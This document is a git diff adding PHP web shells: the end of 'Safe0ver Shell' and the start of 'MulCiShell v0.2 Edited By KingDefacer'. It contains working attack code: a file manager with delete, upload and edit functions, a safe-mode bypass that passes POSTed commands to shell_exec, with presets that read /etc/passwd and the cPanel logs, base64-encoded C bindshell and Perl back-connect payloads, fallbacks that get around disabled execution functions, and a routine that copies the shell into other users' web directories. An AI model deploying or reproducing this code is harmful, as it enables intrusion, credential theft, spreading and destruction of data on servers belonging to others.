+         <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+     <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+     <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+     <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+         }
+      echo "</td></tr></center>";
+ }
+  elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */    echo "<center><table><tr><td NOWRAP>" ;
+      if ($auth == "yes") {
+         if (@unlink($file)==false) {
+              echo "Could not remove \"$file\"<br>";
+           }
+          else {
+              echo "Successfully removed \"$file\"<br>";
+          }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
+         }
+      else {
+            echo "Are you sure you want to delete \"$file\" ?
+           <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+          <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+          <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+          <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+          <input type=\"hidden\" name=\"file\" value=\"$file\">
+          <input type=\"hidden\" name=\"auth\" value=\"yes\">
+ 
+          <input type=\"submit\" value=\"Yes\"></form>
+            <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+     <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+     <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+     <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+         }
+      echo "</td></tr></center>";
+ }
+ elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+     echo "<center><table><tr><td NOWRAP>";
+      $i = 1;
+      while (file_exists("$lastdir/newfile$i.txt"))
+          $i++;
+      $file = fopen("$lastdir/newfile$i.txt", "w+");
+      if ($file == false)
+          echo "Could not create the new file...<br>";
+      else
+          echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+          echo "
+                <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+             <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+             <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+             <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+             </form></center>
+              </td></tr></table></center>           ";
+     }
+ elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+     echo "<center><table><tr><td NOWRAP>" ;
+      $i = 1;
+      while (is_dir("$lastdir/newdir$i"))
+           $i++;
+      $file = mkdir("$lastdir/newdir$i", 0777);
+      if ($file == false)
+          echo "Could not create the new directory...<br>";
+      else
+          echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+      echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+         <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+         <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+         </form></center></td></tr></table></center>";
+ }
+ elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+     $contents = "";
+     $fc = @file( $file );
+       while ( @list( $ln, $line ) = each( $fc ) ) {
+           $contents .= htmlentities( $line ) ;
+      }
+      echo "<br><center><table><tr><td NOWRAP>";
+     echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+     echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+     echo "<strong>EDIT FILE: </strong>$file<br>\n";
+     echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+     echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+     echo "<input type=\"submit\" value=\"Save\">";
+     echo "</form>";
+     echo "</td></tr></table></center>";
+ }
+ elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+     $fo = fopen($file, "w");
+     $wrret = fwrite($fo, stripslashes($contents));
+     $clret = fclose($fo);
+ 
+ }
+ elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+     $downloadfile = urldecode($file);
+     if (function_exists("basename"))
+             $downloadto = basename ($downloadfile);
+     else
+         $downloadto = "download.ext";
+     if (!file_exists("$downloadfile"))
+         echo "The file does not exist";
+     else {
+         $size = @filesize("$downloadfile");
+         if ($size != false) {
+             $add="; size=$size";
+         }            
+         else {
+             $add="";
+         }
+          header("Content-Type: application/download");
+         header("Content-Disposition: attachment; filename=$downloadto$add");
+         $fp=fopen("$downloadfile" ,"rb");
+         fpassthru($fp);
+         flush();
+     }
+ }
+ elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+        ?>
+     <center>
+      <table>
+       <tr>
+        <td NOWRAP>
+             Dosya Yükleme Sekmesine Tikladiniz !
+         <br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
+       <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+              <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+              <input type="hidden" name="cmd" value="uploadproc">
+              <input type="hidden" name="dir" value="<?php echo $dir ?>">
+              <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+              <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+              Dosya Yükle:<br>
+              <input size="75" name="userfile" type="file"><br>
+              <input type="submit" value="Yükle">
+       </form>
+         <br>
+          <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+             <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+             <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+             <input tabindex="0" type="submit" value="Iptal">
+         </form>
+     </td>
+    </tr>
+  </table>
+     </center>
+ 
+      <?php
+ }
+ elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+     echo "<center><table><tr><td NOWRAP>";
+     if (file_exists($userfile))
+         $res = copy($userfile, "$dir/$userfile_name");
+     echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+          if ($res) {
+         echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+         echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
+         echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+     }
+     else {
+         echo "Yüklenemedi...";
+     }
+     echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+     echo "<br><br></td></tr></table></center>";
+ }
+ elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+         echo "<hr>"; 
+     $fc = @file( $file );      while ( @list( $ln, $line ) = each( $fc ) ) {
+           echo spacetonbsp(@htmlentities($line))."<br>\n";
+       }
+     echo "<hr>";
+ }
+ elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+          if (function_exists('is_dir')) {
+          if (is_dir("$oldfile")) {
+              $objname = "Directory";
+              $objident = "Directory";
+           }
+          else {
+              $objname = "Filename";
+              $objident = "file";
+          }
+      }
+        echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+     If (empty($newfile) != true) {
+          echo "<center>";
+          $return = @rename($oldfile, "$olddir$newfile");
+         if ($return) {
+              echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+          }
+          else {
+              if ( @file_exists("$olddir$newfile") ) {
+                  echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+              }
+              else {
+                  echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+              }
+           }
+          echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+      }
+      else {
+          $dpos = strrpos($oldfile, "/");
+          if (strval($dpos)!="") {
+              $olddir = substr($oldfile, 0, $dpos+1);
+            }
+          else {
+              $olddir = "$lastdir/";
+         }
+          $fpos = strrpos($oldfile, "/");
+          if (strval($fpos)!="") {
+              $inputfile = substr($oldfile, $fpos+1);
+            }
+          else {
+              $inputfile = "";
+          }
+                echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+          echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+          echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+          echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+          echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+          echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+          echo "Rename \"$oldfile\" to:<br>\n";
+          echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+         echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+          echo "</td></tr></table></center>";
+      }
+ }
+ else if ( $cmd == "con") {
+ 
+ ?>
+ <table>
+  <tr><td>&nbsp;</td>
+  </tr></table>
+ <?php
+ }    
+ else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+     $isMainMenu = true;
+      ?>
+     <table width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+       <td width="100%" class="border">
+        <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+       </td>
+      </tr>
+     </table>
+     <br>
+      <center>
+     <table border="0" NOWRAP>
+       <tr>
+       <td valign="top" class="silver border">
+            <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?>      </td>
+        <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullanım:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br> 
+         </span></td>
+      </tr>
+        </table>
+     <br><p><br>Safe Mode ByPAss<p><form method="POST">
+ 	<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
+ 	<input type="submit" value="Çalistir"></p>
+ </form>
+ 	<form method="POST">
+ 		<p align="center"><select size="1" name="dizin">
+                 <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
+ 		<option value="cat /etc/passwd">cat /etc/passwd</option>
+ 		<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
+ 		<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
+ 		<option value="cat /etc/hosts">cat /etc/hosts</option>
+                 <option value="cat /etc/named.conf">cat /etc/named.conf</option>
+                 <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
+                 <option value="netstat -an | grep -i listen">Açik Portlar</option>
+                 <option value="ps -aux">Çalisan Uygulamalar</option>
+ </select> <input type="submit" value="Çalistir"></p>
+ 	</form>
+ ------------------------------------------------------------------------------------<p>
+ <?
+ $evilc0der=$_POST['dizin'];
+ if($_POST['dizin'])
+ {
+ ini_restore("safe_mode");
+ ini_restore("open_basedir");
+ $safemodgec = shell_exec($evilc0der);
+ echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
+ }
+ ?>
+ </center>
+     <br>
+      <?php
+ }
+ 
+ if ($cmd != "downl") {
+     if ( $isMainMenu != true) {
+          ?>
+ 
+ 		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+          <tr>
+           <td width="100%" style="class="silver border">
+            <center><strong>
+             &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+             &nbsp;&nbsp;&nbsp;&nbsp;
+                     &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+             </strong></center>
+           </td>
+          </tr>
+         </table>
+         <br>
+         <?php
+ }
+     ?>
+     <table width=100% border="0" cellpadding="0" cellspacing="0">
+      <tr>
+       <td width="100%" class="silver border">
+        <center>&nbsp;<?php include ($a.$b.$c); echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+       </td>
+      </tr>
+     </table>
+         </td>
+   </tr>
+  </table>
+ 
+   <?php
+  }
+ 
+ ?>
diff --git a/php/shellzx.php b/php/shellzx.php
new file mode 100644
index 0000000..b789c0a
--- /dev/null
+++ b/php/shellzx.php
@@ -0,0 +1,1460 @@
+<?php
+#/\/\/\/\/\  MulCiShell v0.2 - Edited By KingDefacer/\/\/\/\/\/\/\#
+# Updates from version 1.0#
+# 1) Fixed MySQL insert function
+# 2) Fixed trailing dirs
+# 3) Fixed file-editing when set to 777
+# 4) Removed mail function (who needs it?)
+# 5) Re-wrote & improved interface
+# 6) Added actions to entire directories
+# 7) Added config+forum finder
+# 8) Added MySQL dump function
+# 9) Added DB+table creation, DB drop, table delete, and column+table count
+# 10) Updated security-info feature to include more useful details
+# 11) _Greatly_ Improved file browsing and handling
+# 12) Added banner
+# 13) Added DB-Parser and locator
+# 14) Added enumeration function
+# 15) Added common functions for bypassing security restrictions
+# 16) Added bindshell & backconnect (needs testing)
+# 17) Improved command execution (alts)
+#/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/#
+@ini_set("memory_limit","256M");
+@set_magic_quotes_runtime(0);
+session_start();
+ob_start();
+$start=microtime();
+if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme'];
+//Thanks korupt ;)
+$backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCljbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCBtc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHNhZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndlsxXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCkpID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCglzYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSBodG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHNvY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAoY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHNhZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTEpew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQoJCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9"; 
+$backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9ydCwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkcikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPVVQpOw0K";
+$pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIGRpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIGhvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0OjpJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jayk7DQp9DQoNCgk=";
+$access_control=0;
+$md5_user="KingDefacer";
+$md5_pass="123";
+$user_agent="KingDefacer";
+$allowed_addrs=array('127.0.0.1');
+$shell_email="KingDefacer@msn.com";
+$self=basename($_SERVER['PHP_SELF']);
+$addr=$_SERVER['REMOTE_ADDR'];
+$serv=@gethostbyname($_SERVER['HTTP_HOST']);
+$soft=$_SERVER['SERVER_SOFTWARE'];
+$safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON";
+$open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON";
+$uname=@php_uname();
+$space=TrueSize(disk_free_space(realpath(getcwd())));
+$total=TrueSize(disk_total_space(realpath(getcwd())));
+$id=@execmd("id",$disable);
+$int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb","discuss");
+$inc_paths=array("includes","include","inc");
+$sql_build_path;
+echo "<script type=\"text/javascript\" language=\"javascript\">
+function togglecheck() 
+{
+    var cb=document.forms[0].check
+    for (i in cb) 
+    {
+        cb[i].checked=(cb[i].checked)?false:true;
+    }
+}
+</script>";
+switch($access_control) #Break statements intentionally ommited
+{
+    case 3:
+    $ip_allwd=false;
+    foreach($allowed_addrs as $addr) 
+    {
+        if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;}
+        if(!$ip_allwd) exit;
+    }
+    case 2:
+    if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass)
+    {
+            header("WWW-Authenticate: Basic Realm=\"Restricted area\"");
+            header("HTTP/1.1 401 Unauthorized");
+            echo "Wrong username/password";
+            exit;
+    }
+    case 1:
+    if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit;
+}
+if($id) 
+{
+        $s=strpos($id,"(",0)+1;
+        $e=strpos($id,")",$s);
+        $idval=substr($id,$s,$e-$s);
+}
+$disable=@ini_get("disable_functions");
+if(empty($disable)) $disable="None";
+function rm_rep($dir,&$success,&$fail)
+{
+        @$dh=opendir($dir);
+        if(is_resource($dh))
+        {
+        while((@$rm=readdir($dh)))
+        {
+            if($rm=='.' || $rm=='..') continue;
+            if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_rep($dir.'/'.$rm,$success,$fail); continue;}
+            if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";}
+            else {$fail++; echo "Failed to delete $rm</br>";}
+        }
+        @closedir($dh);
+    } else echo "Failed to open dir $dir</br>";
+}
+function chmod_rep($dir,&$success,&$fail,$mod_value)
+{
+        @$dh=opendir($dir);
+        if(is_resource($dh))
+        {
+        while((@$ch=readdir($dh)))
+        {
+            if($ch=='.' || $ch=='..') continue;
+            if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;}
+            if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...</br>";}
+            else {$fail++; echo "Failed to chmod $rm</br>";}
+        }
+        @closedir($dh);
+    } else echo "Failed to open dir $dir</br>";
+}
+#Complete these functions
+function spread_self($user,&$c=0,$d=0)
+{
+            if(!$d) $dir="/home/$user/public_html/"; 
+            else $dir=$d;
+            if(is_dir($dir)&&is_writable($dir))
+            {
+                copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); 
+                echo "[+] Shell copied to $dir.$f./mshell.php</br>"; 
+                $c++;
+            }
+            if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>";
+            while((@$f=readdir($dh)))
+            {
+                if($f!="."&&$f!="..")
+                {
+                    if(@is_dir($dir.$f)) 
+                    {
+                        echo "[+] Spreading to dir $dir</br>";
+                        if(@is_writable($dir.$f))
+                        {
+                            copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); 
+                            echo "[+] Shell copied to $dir.$f./mshell.php</br>"; 
+                            $c++;
+                        }
+                        $c+=spread_self($user,$c,$dir.$f.'/');
+                    }
+                }
+            }
+}
+function copy_rep($dir,&$c)
+{
+
+}
+function backup_site()
+{
+    if(!isset($_POST['busite']))
+    {
+        echo "<center>The following tool will attempt to retrieve every file from the specified dir (including child dirs).</br>If successful, you will be prompted for a site backup download.</br><i>Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>"; 
+    }
+}
+function infect_rep($dir,&$success,&$fail)
+{
+}
+function copy_dir($dir,$new_dir)
+{
+}
+##################################
+function execmd($cmd,$d_functions="None")
+{
+    if($d_functions=="None") {$ret=passthru($cmd); return $ret;}
+    $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
+    $d_functions=str_replace(" ","",$d_functions);
+    $dis_funcs=explode(",",$d_functions);
+    foreach($funcs as $safe)
+    {
+        if(!in_array($safe,$dis_funcs)) 
+        {
+            if($safe=="exec")
+            {
+                $ret=@exec($cmd);
+                $ret=join("\n",$ret);
+                return $ret;
+            }
+            elseif($safe=="system")
+            {
+                $ret=@system($cmd);
+                return $ret;
+            }
+            elseif($safe=="passthru")
+            {
+                $ret=@passthru($cmd);
+                return $ret;
+            }
+            elseif($safe=="shell_exec")
+            {
+                $ret=@shell_exec($cmd);
+                return $ret;
+            }
+            elseif($safe=="popen")
+            {
+                $ret=@popen("$cmd",'r');
+                if(is_resource($ret))
+                {
+                    while(@!feof($ret))
+                    $read.=@fgets($ret);
+                    @pclose($ret);
+                    return $read;
+                }
+                return -1;
+            }
+            elseif($safe="proc_open")
+            {
+                $cmdpipe=array(
+                0=>array('pipe','r'),
+                1=>array('pipe','w')
+                );
+                $resource=@proc_open($cmd,$cmdpipe,$pipes);
+                if(@is_resource($resource))
+                {
+                    while(@!feof($pipes[1]))
+                    $ret.=@fgets($pipes[1]);
+                    @fclose($pipes[1]);
+                    @proc_close($resource);
+                    return $ret;
+                }
+                return -1;
+            }
+        }
+    }
+    return -1;
+}
+$links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode",
+"Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf",
+"Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill");
+    echo "<html><head><title>MulCiShell v2.0 - Edited By KingDefacer</title></head>";
+    switch($_SESSION['theme'])
+    {
+        case 'green':
+        echo "<style>
+            body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black;}
+            td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;}
+            td:hover{background-color: black; color: #33FF00;}
+            input{background-color: black; color: #00FF00; border: 1px solid green;}
+            input:hover{background-color: #006600;}
+            textarea{background-color: black; color: #00FF00; border: 1px solid white;}
+            a {text-decoration: none; color: #66FF00; font-weight: bold;}
+            a:hover {color: #00FF00;}
+            select{background-color: black; color: #00FF00;}
+            #main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;}
+            #main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; }
+            #main a:hover{color: #00FF00; text-decoration: underline;}
+            #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
+            </style>
+            <body>";
+        break;
+        case 'dark':
+            echo "<style>
+            body{color: #FFFFFF; font-size: 12px; font-family: serif; background-color: #000000;}
+            td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;}
+            input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;}
+            input:hover{background-color: #000099;}
+            textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;}
+            a {text-decoration: none; color: #FFFFFF; font-weight: bold;}
+            a:hover {font-weight: bold;}
+            select{background-color: #000000; color: #FFFFFF;}
+            #main{border-bottom: 1px solid white; padding: 5px; text-align: center;}
+            #main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-family: arial; text-decoration: none; }
+            #main a:hover{font-weight: bold;}
+            #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
+            </style><body>";
+        break;
+        default:
+            echo "<style>
+            body{color: white; font-size: 12px; font-family: arial; scrollbar-base-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; }
+            td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; }
+            input{background-color: black; color: white; border: 1px solid #000066;}
+            input:hover{background-color: #000066; border: 1px solid white;}
+            td:hover {color: yellow; background: black;}
+            textarea{background-color: #000033; color: white; border: 1px solid white;}
+            a {text-decoration: none; color: white; font-weight: bold;}
+            a:hover {color: yellow}
+            select{background-color: black; color: white;}
+            #main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;}
+            #main a{padding-right: 15px; color: white; font-size: 12px; font-family: arial; text-decoration: none; }
+            #main a:hover{color: #0033FF; text-decoration: underline;}
+            #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
+            </style>
+            <body bgcolor='black'>";
+            break;
+    }
+    echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv
+bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg==");
+echo "<table style='width: inherit; margin: auto; text-align: center;'>
